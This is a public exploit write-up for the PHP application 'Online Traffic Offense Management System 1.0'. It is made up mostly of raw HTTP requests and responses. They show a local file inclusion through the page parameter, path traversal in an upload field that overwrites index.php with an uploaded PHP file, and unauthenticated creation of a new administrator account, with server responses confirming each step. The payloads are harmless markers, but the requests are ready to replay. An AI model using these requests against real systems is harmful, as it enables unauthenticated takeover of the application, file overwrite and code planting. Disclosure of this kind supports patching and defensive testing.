# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)# Date: 07/10/2021# Exploit Author: Hubert Wojciechowski# Contact Author: snup.php@gmail.com# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html# Version: 1.0# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23### Privilage escalation# All requests can be sent by both an authenticated and a non-authenticated user# The vulnerabilities in the application allow for:* Reading any PHP filefrom the server
* Saving files to parent and child directories and overwriting files in server
* Performing operations by an unauthenticated user with application administrator rights
-----------------------------------------------------------------------------------------------------------------------# POC-----------------------------------------------------------------------------------------------------------------------## Example 1 - Reading any PHP file from the server
Example vuln scripts:
http://localhost/traffic_offense/index.php?p=
http://localhost/traffic_offense/admin/?page=# Request reading rrr.php file from other user in serwer
GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------# Response
HTTP/1.1200 OK
Date: Thu,07 Oct 202110:09:35 GMT
Server: Apache/2.4.48(Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu,19 Nov 198108:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin:*
Connection: close
[...]</br></br>Hacked file other user in serwer!</br></br>[...]-----------------------------------------------------------------------------------------------------------------------## Example 2 - Saving files to parent and child directories and overwriting files in server# Request to read file
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept:*/*
Accept-Language: en
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
-----------------------------------------------------------------------------------------------------------------------# Response
HTTP/1.1200 OK
Date: Thu,07 Oct 202110:30:56 GMT
Server: Apache/2.4.48(Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
Expires: Thu,19 Nov 198108:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin:*
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length:15095<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Online Traffic Offense Management System - PHP</title>[...]-----------------------------------------------------------------------------------------------------------------------# Request to overwrite file index.php in main directory webapp
POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript,*/*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
Content-Length:1928
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="id"5/../../../index
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_id_no"
GBN-1020061-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="lastname"
Blake
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="firstname"
Claire
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="middlename"
C
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="dob"1992-10-12-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="present_address"
Sample Addss 123-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="permanent_address"
Sample Addess 123-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="civil_status"
Married
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="nationality"
Filipino
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="contact"09121789456-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_type"
Non-Professional
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="image_path"
uploads/drivers/-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
Content-Type: image/png
<?php
echo "Hacked other client files in this hosting!";
?>-----------------------------329606699635951312463334027403--# New file have extention as this write filename="fuzzdb.php"# New file have name and locate 5/../../../index we can save file in other directory ;)# Line must start digit# We can rewrite config files-----------------------------------------------------------------------------------------------------------------------# Respopnse
HTTP/1.1200 OK
Date: Thu,07 Oct 202110:38:35 GMT
Server: Apache/2.4.48(Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu,19 Nov 198108:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin:*
Content-Length:20
Connection: close
Content-Type: text/html; charset=UTF-8{"status":"success"}-----------------------------------------------------------------------------------------------------------------------# Request to read file index.php again
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept:*/*
Accept-Language: en
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
-----------------------------------------------------------------------------------------------------------------------# Response
HTTP/1.1200 OK
Date: Thu,07 Oct 202110:42:17 GMT
Server: Apache/2.4.48(Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin:*
Content-Length:42
Connection: close
Content-Type: text/html; charset=UTF-8
Hacked other client files in this hosting!
-----------------------------------------------------------------------------------------------------------------------## Example 4 - Performing operations by an unauthenticated user with application administrator rights# The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable# Request adding new admin user to application by sending a request by an authorized user
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept:*/*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length:949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"21-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"
hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"
hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"
hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"
hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"1-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="aaa.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>-----------------------------210106920639395210803657370685-------------------------------------------------------------------------------------------------------------------------# Response
HTTP/1.1200 OK
Date: Thu,07 Oct 202110:50:36 GMT
Server: Apache/2.4.48(Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
Expires: Thu,19 Nov 198108:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin:*
Content-Length:1
Connection: close
Content-Type: text/html; charset=UTF-81# The request worked fine, log into the app using your hack account
